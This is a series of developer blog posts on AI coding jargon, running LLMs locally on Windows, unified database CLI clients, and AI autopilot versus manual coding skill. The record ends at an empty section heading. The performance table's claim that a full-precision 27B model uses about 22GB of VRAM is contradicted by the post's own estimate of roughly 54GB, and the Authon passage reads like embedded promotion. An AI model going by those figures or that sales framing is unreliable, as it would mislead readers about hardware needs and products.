Alan West — Sun, 03 May 2026 17:36:57 GMT

If you've tried to follow any AI coding discussion in the last six months, you've probably felt like everyone suddenly started speaking a dialect you never signed up to learn. "Vibe coding." "Agentic workflows." "Context windows." "Prompt engineering." The jargon is multiplying faster than JavaScript frameworks, and that's saying something.

Matt Pocock — who you might know from his TypeScript education work at Total TypeScript — apparently felt the same frustration. He's put together a dictionary-of-ai-coding repository on GitHub that attempts to explain AI coding jargon in plain English. It's been trending, and honestly, it's the kind of resource I wish existed six months ago.

Why This Matters More Than You Think

Here's the thing: the AI coding space is moving so fast that terms get invented, redefined, and sometimes abandoned within weeks. I've been in meetings where three developers used the same term to mean three different things. That's not a terminology problem — that's a communication breakdown that leads to bad architecture decisions.

Consider how many developers are now interacting with AI tools daily. Whether you're using Cursor, GitHub Copilot, Claude Code, or any other AI-assisted coding tool, you're swimming in terminology that didn't exist two years ago. Having a shared vocabulary isn't just nice — it's necessary.

Some Terms Worth Actually Understanding

Let me walk through a few AI coding terms that I think every developer should internalize, not just recognize.

Context Window

This is the total amount of text (measured in tokens) that an AI model can "see" at once. Think of it like the model's working memory.

# A simplified mental model of context windows
context_window = {
    "system_prompt": 500,      # instructions to the model
    "conversation_history": 3000,  # prior messages
    "current_code": 2000,      # the file you're working on
    "available_for_response": 2500  # what's left for the AI to generate
}
# When you hit the limit, older context gets dropped
# This is why AI "forgets" things in long conversations

Why does this matter practically? Because when your AI coding assistant starts giving weird suggestions halfway through a session, it's probably not broken — it's lost context. Understanding this changes how you structure your interactions.
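
Here is a toy version of the "older context gets dropped" behaviour. It is a sketch of one possible policy, not how any particular tool works: the whitespace-based token count is a crude stand-in for a real tokenizer, and the function names are made up for this example.

```python
def count_tokens(text):
    # Crude stand-in: real tokenizers split text differently
    return len(text.split())

def fit_to_window(system_prompt, history, budget):
    """Keep the system prompt plus the newest messages that fit in budget."""
    remaining = budget - count_tokens(system_prompt)
    kept = []
    for message in reversed(history):  # walk from newest to oldest
        cost = count_tokens(message)
        if cost > remaining:
            break  # this message and everything older is dropped
        kept.append(message)
        remaining -= cost
    return list(reversed(kept))


history = [
    "use tabs not spaces in this repo",
    "rename the parser module to csv_reader",
    "now add tests for csv_reader",
]
print(fit_to_window("you are a coding assistant", history, budget=18))
# ['rename the parser module to csv_reader', 'now add tests for csv_reader']
```

The instruction about tabs was the first thing said and the first thing lost, which is why restating important constraints late in a long session often fixes "weird" suggestions.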

Agentic Coding

This is where the AI doesn't just suggest code — it takes actions. It reads files, runs commands, creates branches, executes tests. The shift from "autocomplete on steroids" to "junior developer who never sleeps" is the agentic shift.

// Non-agentic: AI suggests code inline
// You: "write a function to parse CSV"
// AI: here's a function (you copy-paste it)

// Agentic: AI takes autonomous actions
// You: "add CSV parsing to the data pipeline"
// AI: 
//   1. reads your existing pipeline code
//   2. creates a new parser module
//   3. writes tests
//   4. runs the tests
//   5. fixes failures
//   6. commits the changes

I've been using agentic coding tools more heavily over the past few months, and the mental model shift is real. You stop thinking about writing code and start thinking about reviewing code. That's a fundamentally different skill.

Vibe Coding

Coined by Andrej Karpathy, this one describes the practice of building software by describing what you want in natural language and letting AI handle the implementation details. You're coding by vibes, not by syntax.

It sounds wild, but I've seen people build functional prototypes this way in hours. The catch? The code quality is often... questionable. Vibe coding is great for prototyping and terrible for production systems that need to be maintained.

Prompt Engineering vs. Prompt Design

I've noticed people using these interchangeably, but they're subtly different. Prompt engineering is the technical practice of crafting inputs to get specific outputs from a model. Prompt design is broader — it's about designing the entire interaction pattern, including system prompts, context management, and output formatting.

# Prompt engineering (tactical)
prompt: "Convert this function to use async/await. 
        Keep error handling. Return the same types."

# Prompt design (strategic)
system: "You are a code modernization assistant.
        Always preserve existing tests.
        Explain breaking changes before making them."
context:
  - existing_code: "./src/legacy/"
  - test_suite: "./tests/"
  - style_guide: "./.eslintrc"
output_format: "diff with inline comments"

The Meta-Problem: Jargon as Gatekeeping

Here's where I get a bit opinionated. The rapid proliferation of AI coding jargon has a real gatekeeping effect. When senior engineers casually throw around terms like "RAG pipeline," "few-shot prompting," and "temperature tuning" in standups, junior developers nod along while internally panicking.

That's why open, community-maintained resources like Matt Pocock's dictionary matter. They lower the barrier to entry. You don't need to take a course or read a paper — you just need a plain-English explanation you can reference in two minutes.

How to Actually Keep Up

A few practical strategies that have worked for me:

Learn terms in context, not in isolation. Don't memorize definitions. Use an AI coding tool, hit a concept you don't understand, look it up, then keep going. The hands-on context makes it stick.
Build a personal glossary. I keep a markdown file in my notes app. When I encounter a new term, I write down what I think it means, then verify. The act of writing it down is what cements it.
Follow the tool changelogs. Cursor, Copilot, Claude Code — they all publish updates. Reading changelogs teaches you terminology naturally because the terms are attached to real features.
Track your own tools. On a related note, privacy-focused analytics tools like Umami or Plausible can help you understand how developers interact with your projects and docs without invasive tracking — useful if you're building developer tools yourself.

The Dictionary Approach Is Smart

What I appreciate about the dictionary-of-ai-coding repo is the format. It's not a tutorial. It's not a course. It's a reference. When you're in the middle of reading a blog post or sitting in a meeting and someone drops a term you don't know, you want a 30-second answer, not a 30-minute video.

The repo is open source, which means the community can contribute definitions and keep them updated as the terminology evolves. That's important because — and I cannot stress this enough — the definitions will change. "Agent" meant something different in AI circles twelve months ago than it does today.

My Advice: Don't Panic, But Don't Ignore It Either

If you're feeling overwhelmed by AI coding terminology, you're in good company. The field is genuinely moving fast, and nobody has it all figured out. But here's the thing — you don't need to know every term. You need to know the ones that affect your daily work.

Start with the basics: context windows, tokens, prompts, agents. Bookmark Matt's dictionary for when you hit something unfamiliar. And most importantly, don't let jargon stop you from actually using these tools.

The developers who'll thrive aren't the ones who can define every term perfectly. They're the ones who can ship code — with or without AI assistance — and communicate clearly about what they're doing. A shared vocabulary just makes that communication easier.

Running LLMs on Windows: Native vLLM vs WSL vs llama.cpp Compared

Alan West — Sun, 03 May 2026 16:23:17 GMT

The Windows local LLM story just got interesting. Someone recently demonstrated Qwen3's 27B model running at 72 tokens per second on an RTX 3090 — natively on Windows. No WSL. No Docker. Just a portable vLLM launcher.

If you've been running local models on Windows, you know the pain. Let me break down how the landscape has shifted and help you pick the right inference stack.

Why This Comparison Matters Now

For the longest time, running vLLM on Windows meant one of two things: spin up WSL2 or wrestle with Docker Desktop. Both add overhead, complexity, and weird networking quirks. Native Windows support changes the calculus entirely.

I've been running local models for inference on my dev machine for months — mostly through llama.cpp and Ollama. When I saw native vLLM hitting 72 tok/s on a 3090 with a 27B parameter model, I had to dig in.

The Contenders

Here's what we're comparing:

Native vLLM on Windows — the new kid, portable launcher approach
vLLM via WSL2 — the established "proper" way
llama.cpp (direct) — the GGUF Swiss army knife
Ollama — the "just works" option

Setup Complexity

Native vLLM (Windows)

From what's been shared, the portable installer handles CUDA dependencies and sets up vLLM without requiring a Linux subsystem:

# Reportedly as simple as:
./vllm-launcher.exe --model Qwen/Qwen3-27B --gpu-memory-utilization 0.95

# The launcher handles:
# - CUDA toolkit detection/bundling
# - Python environment isolation
# - Model downloading and caching

The "portable" aspect is key — no global Python installation conflicts, no PATH pollution.

vLLM via WSL2

# First, ensure WSL2 is set up with CUDA passthrough
wsl --install -d Ubuntu-22.04

# Inside WSL:
pip install vllm
python -m vllm.entrypoints.openai.api_server \
  --model Qwen/Qwen3-27B \
  --tensor-parallel-size 1 \
  --gpu-memory-utilization 0.95

Works well, but you're maintaining a full Linux userspace. GPU passthrough occasionally breaks after Windows updates. Ask me how I know.

llama.cpp

# Download a GGUF quantized model
# Run the server with CUDA acceleration
./llama-server.exe -m qwen3-27b-q4_k_m.gguf \
  -ngl 99 \
  -c 8192 \
  --host 0.0.0.0 \
  --port 8080

# -ngl 99: offload all layers to GPU
# -c 8192: context window size

Native Windows binary. No fuss. But you're using quantized models (usually Q4 or Q5), which trades some quality for speed and memory savings.

Ollama

# Literally just:
ollama run qwen3:27b

# Or serve it as an API:
ollama serve
# Then: curl http://localhost:11434/api/generate -d '{"model": "qwen3:27b", "prompt": "hello"}'

Ollama wins on simplicity every single time. It's the brew install of local LLMs.

Performance Comparison (RTX 3090, 24GB VRAM)

Stack	Model Format	~Throughput	VRAM Usage	Quality
Native vLLM	FP16/BF16	~72 tok/s	~22GB	Full precision
WSL vLLM	FP16/BF16	~65-70 tok/s	~22GB + WSL overhead	Full precision
llama.cpp	Q4_K_M GGUF	~45-55 tok/s	~16GB	Slight quality loss
Ollama	Q4_K_M (internal)	~40-50 tok/s	~16GB	Slight quality loss

Note: These are approximate numbers based on community reports. Your mileage will vary based on context length, batch size, and specific GPU silicon lottery.

The native vLLM numbers are impressive because you're getting full-precision inference without the WSL tax. That 5-10% overhead from the virtualization layer adds up.

When to Use What

Choose native vLLM if:

You need maximum throughput with full precision
You're building production-adjacent inference pipelines
You want PagedAttention and continuous batching
You don't want to maintain a WSL environment

Choose WSL vLLM if:

You need the full vLLM ecosystem (already battle-tested on Linux)
You're comfortable with WSL and already have it configured
You need features that might not be in the Windows port yet

Choose llama.cpp if:

You want maximum flexibility with model formats
You're fine with quantized models (honestly, Q5_K_M is barely distinguishable from FP16 for most tasks)
You need to run on machines with less VRAM
You want one static binary with zero dependencies

Choose Ollama if:

You want zero configuration
You're prototyping or doing local development
You need quick model switching
You're not chasing maximum throughput

Migration: From Ollama/llama.cpp to Native vLLM

If you're currently using Ollama or llama.cpp and want to try native vLLM for better throughput:

Step 1: Check Your VRAM Budget

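A 27B-parameter model in FP16 needs roughly 54GB for the weights alone (27 billion parameters × 2 bytes). vLLM's PagedAttention cuts KV-cache waste, but it doesn't shrink the weights, so I'd treat reports of a full-precision 27B model fitting in 24GB with suspicion. On a single 24GB card you'll most likely need a quantized checkpoint or more than one GPU. Confirm your GPU can handle it before you commit.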
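The weight footprint is plain arithmetic, so it's worth checking before you download anything. Here's a minimal sketch, assuming the weights dominate and ignoring KV cache, activations, and runtime overhead. The bytes-per-parameter figures are approximations, and the 4-bit value in particular is a rough average I'm assuming for Q4-style formats, not an exact spec.

```python
# Rough weight-memory estimate: parameters x bytes per parameter.
# Ignores KV cache, activations, and framework overhead, so real usage is higher.

BYTES_PER_PARAM = {
    "fp16": 2.0,
    "bf16": 2.0,
    "int8": 1.0,
    "q4": 0.6,  # assumed average for 4-bit quantization including scales (approximate)
}

def weight_gb(params_billion: float, dtype: str) -> float:
    """Return the approximate weight size in GB (1 GB = 1e9 bytes)."""
    return params_billion * 1e9 * BYTES_PER_PARAM[dtype] / 1e9

def fits(params_billion: float, dtype: str, vram_gb: float, headroom_gb: float = 2.0) -> bool:
    """True if the weights fit while leaving headroom_gb for cache and overhead."""
    return weight_gb(params_billion, dtype) + headroom_gb <= vram_gb

if __name__ == "__main__":
    for dtype in ("fp16", "int8", "q4"):
        size = weight_gb(27, dtype)
        print(f"27B @ {dtype}: ~{size:.1f} GB, fits in 24 GB: {fits(27, dtype, 24)}")
```

The 2GB headroom default is a guess on my part. Long contexts or large batches will want considerably more.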

Step 2: Swap Your API Calls

vLLM exposes an OpenAI-compatible API, so migration is straightforward:

import openai

# Before (Ollama):
client = openai.OpenAI(
    base_url="http://localhost:11434/v1",
    api_key="ollama"  # Ollama doesn't validate this
)

# After (native vLLM):
client = openai.OpenAI(
    base_url="http://localhost:8000/v1",
    api_key="token-abc123"  # only checked if the server was started with --api-key
)

# Your actual inference code stays the same, apart from the model name
# (Ollama expects a tag such as "qwen3:27b")
response = client.chat.completions.create(
    model="Qwen/Qwen3-27B",
    messages=[{"role": "user", "content": "Explain PagedAttention"}],
    temperature=0.7
)

Since both expose OpenAI-compatible endpoints, your application code barely changes.
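If you expect to flip between backends while comparing them, it can help to keep the differences in one small table instead of editing the client constructor each time. This is a sketch only: the `Backend` dataclass, the `pick_backend` helper, and the `LLM_BACKEND` environment variable are names I made up for illustration, and the ports and model names are simply the ones used in this post.

```python
import os
from dataclasses import dataclass

@dataclass(frozen=True)
class Backend:
    base_url: str
    api_key: str
    model: str

# Ports and model names mirror the examples in this post; adjust for your setup.
BACKENDS = {
    "ollama": Backend("http://localhost:11434/v1", "ollama", "qwen3:27b"),
    "vllm": Backend("http://localhost:8000/v1", "token-abc123", "Qwen/Qwen3-27B"),
}

def pick_backend(name=None) -> Backend:
    """Resolve a backend by name, falling back to the (hypothetical) LLM_BACKEND env var."""
    key = (name or os.environ.get("LLM_BACKEND", "ollama")).lower()
    if key not in BACKENDS:
        raise ValueError(f"unknown backend {key!r}; expected one of {sorted(BACKENDS)}")
    return BACKENDS[key]

if __name__ == "__main__":
    backend = pick_backend("vllm")
    print(backend.base_url, backend.model)
    # With the openai package installed, the client would then be built as:
    # client = openai.OpenAI(base_url=backend.base_url, api_key=backend.api_key)
```

The model name travels with the backend because it's the one part of the request that differs between the two servers.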

Step 3: Benchmark YOUR Workload

Don't trust anyone's benchmarks (including mine). Run your actual prompts:

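import time

# Placeholder: swap in your own loader that returns a list of prompt strings
prompts = load_your_actual_prompts()  # Use real data

completion_tokens = 0
start = time.perf_counter()
for prompt in prompts:
    response = client.chat.completions.create(
        model="Qwen/Qwen3-27B",
        messages=[{"role": "user", "content": prompt}],
        max_tokens=512
    )
    # usage may be absent on some servers, so guard against None
    if response.usage is not None:
        completion_tokens += response.usage.completion_tokens
elapsed = time.perf_counter() - start
print(f"Total: {elapsed:.1f}s for {len(prompts)} prompts")
# Sequential requests only; this says nothing about batched throughput
print(f"Throughput: {completion_tokens / elapsed:.1f} completion tok/s")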
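A single total hides the slow outliers. If you also record each request's latency and completion-token count, a small helper can report median and tail latency alongside throughput. A sketch, assuming requests run one after another (so the summed latencies approximate wall time) and using a nearest-rank p95. The `summarize` name and the tuple layout are my own choices.

```python
import statistics

def summarize(samples):
    """Summarize a list of (latency_seconds, completion_tokens) tuples, one per request."""
    if not samples:
        raise ValueError("no samples")
    latencies = sorted(latency for latency, _ in samples)
    total_tokens = sum(tokens for _, tokens in samples)
    total_time = sum(latencies)
    # Nearest-rank p95: ceil(0.95 * n), computed with integers to avoid float rounding
    rank = (95 * len(latencies) + 99) // 100
    return {
        "requests": len(samples),
        "p50_s": statistics.median(latencies),
        "p95_s": latencies[rank - 1],
        "tok_per_s": total_tokens / total_time if total_time > 0 else 0.0,
    }

if __name__ == "__main__":
    demo = [(1.0, 100), (2.0, 100), (3.0, 100), (4.0, 100)]
    print(summarize(demo))
```

With concurrent requests the summed latencies overstate wall time, so measure elapsed time around the whole batch instead.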

The Bigger Picture

Native Windows support for vLLM is a big deal for the local inference ecosystem. The WSL requirement was a genuine barrier — not because it's hard to set up, but because it adds a layer of indirection that complicates deployment, debugging, and resource management.

That said, I wouldn't abandon llama.cpp or Ollama. They solve different problems. If you're running quantized models on consumer hardware and don't need continuous batching, llama.cpp remains excellent. If you want a five-second setup for prototyping, Ollama is unbeatable.

But if you're building anything that needs to serve multiple concurrent requests with full-precision models on Windows — native vLLM just became the obvious choice.

I'm planning to do more thorough benchmarks once the portable launcher stabilizes. For now, the early numbers are promising enough that it's worth keeping on your radar.

How to Stop Juggling 5 Different Database Clients in Development

Alan West — Sun, 03 May 2026 14:26:52 GMT

If you've ever had pgAdmin open in one window, a Redis CLI in a terminal tab, MySQL Workbench somewhere in the background, and a MongoDB Compass window you forgot about, you know the pain. You're not actually doing database work. You're doing window management.

I hit this wall recently on a project that used PostgreSQL for the main data store, Redis for caching, and SQLite for a local analytics pipeline. Three databases, three completely different tools, three sets of keyboard shortcuts, three ways to export a query result. It's death by a thousand context switches.

The root problem isn't that these tools are bad individually. It's that no single client historically covered all the databases a modern project touches.

Why Multi-Database Tooling Is Broken

Most database clients fall into one of two camps:

Specialized clients (pgAdmin, Redis Insight, MongoDB Compass) — great for one database, useless for everything else
Universal GUI clients (DBeaver, DataGrip) — they cover a lot of databases but are heavyweight, often slow to start, and the free tiers can be limited

For quick development queries, neither camp is ideal. I don't need a full visual schema designer. I need to run a query, see the result, and get back to coding. The overhead of launching a full GUI app for a SELECT * FROM users WHERE id = 42 is absurd.

This is where lightweight, terminal-native database clients start to make a lot of sense.

Enter dbx: One CLI Client for (Almost) Everything

I stumbled on dbx recently — it's an open-source, cross-platform database client that supports MySQL, PostgreSQL, SQLite, Redis, MongoDB, DuckDB, ClickHouse, SQL Server, and more from a single tool.

The pitch is simple: one binary, multiple database engines, terminal-native. No Electron app eating 800MB of RAM.

Getting Connected

The typical workflow with a tool like this looks something like:

# Connect to your PostgreSQL instance
dbx --driver postgres --host localhost --port 5432 --db myapp_dev --user dev

# Or hit a local SQLite file directly
dbx --driver sqlite --db ./analytics.db

# Connect to Redis
dbx --driver redis --host localhost --port 6379

The key thing here is the mental model stays the same regardless of the backend. You're not learning a new tool for each database — you're learning one interface and pointing it at different engines.

Running Queries Across Engines

Once connected, you interact with your database through a consistent interface. For SQL databases, you write SQL. For document stores like MongoDB, you use the query syntax appropriate to that engine. But the experience — connecting, viewing results, exiting — stays uniform.

-- Works the same whether you're on PostgreSQL, MySQL, or SQLite
SELECT u.email, COUNT(o.id) as order_count
FROM users u
LEFT JOIN orders o ON o.user_id = u.id
WHERE u.created_at > '2025-01-01'
GROUP BY u.email
ORDER BY order_count DESC
LIMIT 20;

No remembering whether it's psql's \dt or MySQL's SHOW TABLES. One tool, consistent behavior.

The Real Fix: Consolidating Your Database Workflow

Here's the step-by-step approach I've started using to tame the multi-database chaos:

Step 1: Audit Your Database Touchpoints

Before installing anything, figure out what you're actually connecting to day-to-day:

# Check what's running locally
# Look for common database ports
lsof -i :5432  # PostgreSQL
lsof -i :3306  # MySQL
lsof -i :6379  # Redis
lsof -i :27017 # MongoDB
lsof -i :9000  # ClickHouse

Most developers I know are touching 2-4 different database engines regularly. If you're only on one engine, a specialized client is probably fine. But the moment you hit two or more, consolidation pays off immediately.
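lsof isn't available everywhere (Windows, minimal containers), so here's a rough cross-platform version of the same audit using only the Python standard library. It just attempts a TCP connection to each default port. A successful connection means something is listening there, not necessarily the database you expect. The `is_listening` helper name is mine.

```python
import socket

# Default ports from the lsof list above; adjust for your setup.
DEFAULT_PORTS = {
    "PostgreSQL": 5432,
    "MySQL": 3306,
    "Redis": 6379,
    "MongoDB": 27017,
    "ClickHouse": 9000,
}

def is_listening(port: int, host: str = "127.0.0.1", timeout: float = 0.5) -> bool:
    """Return True if a TCP connection to host:port succeeds."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

if __name__ == "__main__":
    for name, port in DEFAULT_PORTS.items():
        state = "up" if is_listening(port) else "not listening"
        print(f"{name:<11} :{port:<6} {state}")
```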

Step 2: Replace Individual CLIs with a Unified Tool

Instead of maintaining muscle memory for psql, mysql, redis-cli, and mongosh separately, use a single client that normalizes the experience. A tool like dbx gives you that.

The advantage isn't just fewer tools to install — it's fewer tools to configure. One place for connection strings, one set of keybindings, one output format.

Step 3: Script Your Common Connections

Once you've settled on a unified client, alias your common connections:

# Add to your .bashrc or .zshrc
alias db-main='dbx --driver postgres --host localhost --port 5432 --db myapp_dev --user dev'
alias db-cache='dbx --driver redis --host localhost --port 6379'
alias db-analytics='dbx --driver sqlite --db ~/projects/myapp/analytics.db'
alias db-warehouse='dbx --driver duckdb --db ~/data/warehouse.duckdb'

Now switching between databases is literally typing db-main or db-cache. The cognitive overhead drops to near zero.
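Once the list of aliases grows, I'd rather generate them from one table than hand-edit shell quoting. A minimal sketch: the `PROFILES` table and `alias_line` helper are hypothetical, and the flag names simply mirror the dbx examples in this post, so check them against whatever client you actually use.

```python
import shlex

# Hypothetical profile table; flag names mirror the dbx examples in this post.
PROFILES = {
    "db-main": {"driver": "postgres", "host": "localhost", "port": 5432,
                "db": "myapp_dev", "user": "dev"},
    "db-cache": {"driver": "redis", "host": "localhost", "port": 6379},
    "db-analytics": {"driver": "sqlite", "db": "./analytics.db"},
}

def alias_line(name: str, options: dict) -> str:
    """Render one shell alias, quoting every value so spaces or metacharacters are safe."""
    args = " ".join(f"--{flag} {shlex.quote(str(value))}" for flag, value in options.items())
    return f"alias {name}={shlex.quote('dbx ' + args)}"

if __name__ == "__main__":
    # Redirect the output into a file sourced from .bashrc or .zshrc
    for name, options in PROFILES.items():
        print(alias_line(name, options))
```

One caveat: a value starting with `~` gets quoted and therefore won't be tilde-expanded by the shell, which is why the sketch sticks to explicit paths.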

Step 4: Use It in CI and Scripting Too

A lightweight CLI tool shines in CI pipelines where you can't exactly install DBeaver. Need to verify a migration ran correctly? Need to seed test data across multiple database engines?

# In a CI script: verify migration on PostgreSQL
# (variables are quoted so empty or space-containing values fail loudly)
dbx --driver postgres --host "$DB_HOST" --db "$DB_NAME" --user "$DB_USER" \
  -e "SELECT COUNT(*) FROM information_schema.columns WHERE table_name = 'users' AND column_name = 'email_verified';"

# Check Redis cache is warm after deploy
dbx --driver redis --host "$REDIS_HOST" \
  -e "DBSIZE"

Having a single binary that handles multiple engines means your CI doesn't need to install three different client packages.

Prevention: Keeping Your Tooling Lean Going Forward

A few principles I've adopted:

Default to one multi-engine client for day-to-day work. Only reach for a specialized tool when you need features the unified client genuinely lacks (like pgAdmin's visual EXPLAIN plans)
Version-pin your database tools just like you version-pin your application dependencies. A database client update shouldn't silently change output formatting in your scripts
Keep connection configs in dotfiles, not in GUI app preferences that don't survive a laptop migration
Test your database tooling in CI before you need it in CI. Nothing worse than discovering your client doesn't support a flag when a deploy is waiting

When This Approach Doesn't Work

I want to be honest about the tradeoffs. A unified CLI client won't replace everything:

If you live in visual query builders, you'll still want a GUI tool
For complex schema visualization, specialized tools like pgAdmin or MongoDB Compass have dedicated features that a CLI can't match
If your team is standardized on a specific client, switching for the sake of switching creates friction

But for the 80% of database interactions that are "run a query, see the result, move on" — a single lightweight tool like dbx eliminates a surprising amount of daily friction.

I haven't tested every database engine dbx supports, and the project is relatively new, so I'd suggest checking the GitHub repo for the latest on driver support and any known limitations. But the pattern of consolidating database clients into one tool? That's been a genuine quality-of-life improvement for me, regardless of which specific tool you choose to do it with.

AI Coding Autopilot vs Manual Control: What Aviation Taught Us About Skill Decay

Alan West — Sat, 02 May 2026 23:16:35 GMT

The aviation industry has a term that should terrify every developer leaning on AI coding tools: automation complacency. Pilots figured out decades ago that the more you rely on autopilot, the worse you get at actually flying the plane. And when the autopilot fails — because it always eventually does — you'd better hope your manual skills haven't atrophied.

We're living through the exact same transition in software engineering right now. AI coding assistants are our autopilot, and most of us haven't thought about what happens when we need to hand-fly.

The Aviation Parallel: Children of the Magenta

In pilot training, there's a famous concept called "Children of the Magenta" — a reference to the magenta-colored flight director lines on cockpit displays. Some pilots become so dependent on following those magenta lines that when the automation disengages, they freeze. They've lost the instinct to scan instruments, interpret raw data, and make manual corrections.

Aviation solved this problem roughly 30 years ago with a framework that's surprisingly applicable to us:

Mandatory manual flying hours — Pilots must regularly hand-fly to maintain proficiency
Automation level awareness — Pilots are trained to know exactly which systems are active and what they're doing
Graduated automation — Use the minimum level of automation needed for the situation
Takeover drills — Regular practice switching from autopilot to manual control under stress

Sound familiar? It should. Because right now, the average developer using Copilot or Cursor or Claude Code has none of these safeguards in place.

Two Approaches to AI-Assisted Development

Let's make this concrete. I see two distinct approaches emerging in how developers use AI tools, and the difference matters more than most people realize.

Approach A: Full Autopilot ("Vibe Coding")

You describe what you want in natural language, the AI generates entire files, you accept the suggestions, maybe glance at the output, ship it.

# You type a prompt like:
# "Create a FastAPI endpoint that handles user registration 
#  with email verification and rate limiting"

# The AI generates 200 lines of code.
# You hit "Accept All" and move on.
# You probably didn't notice it's storing the verification 
# token in plain text, or that the rate limiter 
# resets on server restart because it's in-memory.

This is the Children of the Magenta approach. It works great — until it doesn't. And when it doesn't, you're staring at code you don't fully understand, trying to debug logic someone else (something else?) wrote.
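To make the plain-text token problem concrete, here's roughly what the safer version looks like: email the raw token, store only its hash, and compare in constant time. It's a sketch using the standard library. The function names are mine, and a real flow would also want an expiry timestamp and single-use enforcement.

```python
import hashlib
import hmac
import secrets

def issue_token():
    """Return (token_for_email, digest_for_storage). Only the digest is persisted."""
    token = secrets.token_urlsafe(32)
    digest = hashlib.sha256(token.encode("utf-8")).hexdigest()
    return token, digest

def verify_token(presented: str, stored_digest: str) -> bool:
    """Hash the presented token and compare against the stored digest in constant time."""
    candidate = hashlib.sha256(presented.encode("utf-8")).hexdigest()
    return hmac.compare_digest(candidate, stored_digest)

if __name__ == "__main__":
    token, digest = issue_token()
    print("valid token accepted:", verify_token(token, digest))
    print("tampered token accepted:", verify_token(token + "x", digest))
```

A fast hash is reasonable here because the token is long and random. That reasoning doesn't carry over to user-chosen passwords.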

Approach B: Graduated Automation ("Pilot in Command")

You write the architecture yourself. You use AI for the tedious parts — boilerplate, test scaffolding, repetitive CRUD. But you understand every line that ships.

# You architect the endpoint yourself:
import os

from fastapi import FastAPI, Depends, HTTPException, Request
# async client, because the calls below are awaited;
# you chose Redis deliberately for distributed rate limiting
from redis.asyncio import Redis

# Read the URL from the environment (swap in your own settings object)
redis_client = Redis.from_url(os.environ.get("REDIS_URL", "redis://localhost:6379/0"))

async def check_rate_limit(request: Request):
    client_ip = request.client.host
    key = f"register:{client_ip}"
    current = await redis_client.incr(key)
    if current == 1:
        await redis_client.expire(key, 3600)  # 1 hour window
    if current > 5:  # max 5 registration attempts per hour
        raise HTTPException(status_code=429, detail="Too many attempts")

# THEN you let AI help fill in the email verification logic,
# the input validation schemas, the test fixtures.
# You review every line because you understand the intent.

The difference isn't productivity — both approaches ship features. The difference is what happens six months later when that rate limiter needs to handle a distributed deployment, or when the email verification flow has a subtle race condition.
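One way to check that you actually understand the limiter is to run its logic without a Redis server. The sketch below uses an in-memory stand-in (`FakeStore`, my own invention) that mimics just the INCR and EXPIRE behaviour the endpoint relies on, with an injectable clock so the window can be fast-forwarded. It's a model for reasoning about the fixed-window behaviour, not a replacement for Redis.

```python
class FakeStore:
    """In-memory stand-in for the two Redis commands the limiter uses (INCR, EXPIRE)."""

    def __init__(self, clock):
        self._clock = clock
        self._data = {}  # key -> [count, expires_at or None]

    def incr(self, key):
        entry = self._data.get(key)
        expired = entry is not None and entry[1] is not None and self._clock() >= entry[1]
        if entry is None or expired:
            entry = [0, None]
            self._data[key] = entry
        entry[0] += 1
        return entry[0]

    def expire(self, key, seconds):
        if key in self._data:
            self._data[key][1] = self._clock() + seconds

def allow(store, client_ip, limit=5, window=3600):
    """Fixed-window check using the same INCR-then-EXPIRE sequence as the endpoint."""
    key = f"register:{client_ip}"
    current = store.incr(key)
    if current == 1:
        store.expire(key, window)
    return current <= limit

if __name__ == "__main__":
    now = [0.0]
    store = FakeStore(clock=lambda: now[0])
    print([allow(store, "203.0.113.7") for _ in range(6)])  # the sixth attempt is rejected
    now[0] += 3600
    print(allow(store, "203.0.113.7"))  # window has expired, so the counter starts over
```

Walking through it also surfaces the fixed-window quirk: a client can burst right before and right after the boundary, which a sliding window would smooth out.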

Where This Gets Real: Authentication

Authentication is actually a perfect case study for this autopilot vs. manual control debate. It's complex enough that getting it wrong has real consequences, but common enough that AI tools will confidently generate auth code that looks correct.

I've seen AI assistants generate JWT implementations with hardcoded secrets, session management without proper invalidation, and OAuth flows that skip the state parameter (hello, CSRF). The code compiles. The tests pass. The security holes are invisible unless you know what to look for.
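The missing state parameter is the easiest of these to show in a few lines. Here's a framework-agnostic sketch, assuming `session` is any dict-like per-user store and the endpoint URLs are placeholders. The query parameters are the standard OAuth 2.0 authorization-code ones, and the helper names are mine.

```python
import hmac
import secrets
from urllib.parse import urlencode

def build_authorize_url(authorize_endpoint, client_id, redirect_uri, session):
    """Create a random state, remember it in the session, and return the redirect URL."""
    state = secrets.token_urlsafe(32)
    session["oauth_state"] = state
    query = urlencode({
        "response_type": "code",
        "client_id": client_id,
        "redirect_uri": redirect_uri,
        "state": state,
    })
    return f"{authorize_endpoint}?{query}"

def state_is_valid(returned_state, session):
    """Check the callback's state against the stored one, then discard it (single use)."""
    expected = session.pop("oauth_state", None)
    if not expected or not returned_state:
        return False
    return hmac.compare_digest(expected, returned_state)

if __name__ == "__main__":
    session = {}
    url = build_authorize_url(
        "https://idp.example/authorize", "my-client-id", "https://app.example/callback", session
    )
    print(url)
```

The callback handler should call `state_is_valid` before exchanging the code for tokens and reject the request outright if it returns False.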

This is where the "graduated automation" philosophy gets interesting. Instead of writing auth from scratch (manual flying) or blindly accepting AI-generated auth code (full autopilot), you pick the right level of automation for the risk.

Here's what that spectrum looks like for auth:

Approach	Automation Level	Risk	When to Use
Roll your own	None (hand-flying)	High — you'll miss edge cases	Almost never in production
AI-generated auth	High autopilot	High — AI misses security nuances	Prototyping only
Auth library (passport.js, etc.)	Medium automation	Medium — you still configure it	When you need deep customization
Hosted auth service	Full managed	Low — security is their problem	Most production apps

For hosted auth, the market has a few solid options. Auth0 is the incumbent — mature, well-documented, but the pricing can surprise you as you scale. Clerk is developer-friendly with great React components, though you're fairly locked into their ecosystem.

A newer option worth looking at is Authon, which takes a different angle. It's a hosted auth service with 15 SDKs across 6 languages and 10+ OAuth providers. The pricing model stands out: unlimited users on the free plan with no per-user pricing, which eliminates the cost anxiety that kicks in when your Auth0 bill starts climbing. It also offers compatibility with Clerk and Auth0 APIs, which means migration is less painful than usual.

To be fair about tradeoffs: Authon doesn't offer SSO via SAML/LDAP yet (it's planned), and custom domains aren't available yet either. Self-hosting is on the roadmap but not shipping today. If you need enterprise SSO right now, Auth0 is still your best bet. But for startups and mid-size apps where per-user pricing is the pain point, it's a compelling alternative.

// Migrating from Auth0 to Authon is relatively straightforward
// given the API compatibility layer

// Before (Auth0)
import { Auth0Client } from '@auth0/auth0-spa-js';
const auth0 = new Auth0Client({
  domain: 'your-app.auth0.com',
  clientId: 'your-client-id'
});

// After (Authon) — similar patterns, different provider
import { AuthonClient } from '@authon/sdk';
const authon = new AuthonClient({
  appId: 'your-app-id',
  // No per-user pricing means you stop worrying 
  // about the billing page at 10k users
});

Building Your Own "Manual Flying" Practice

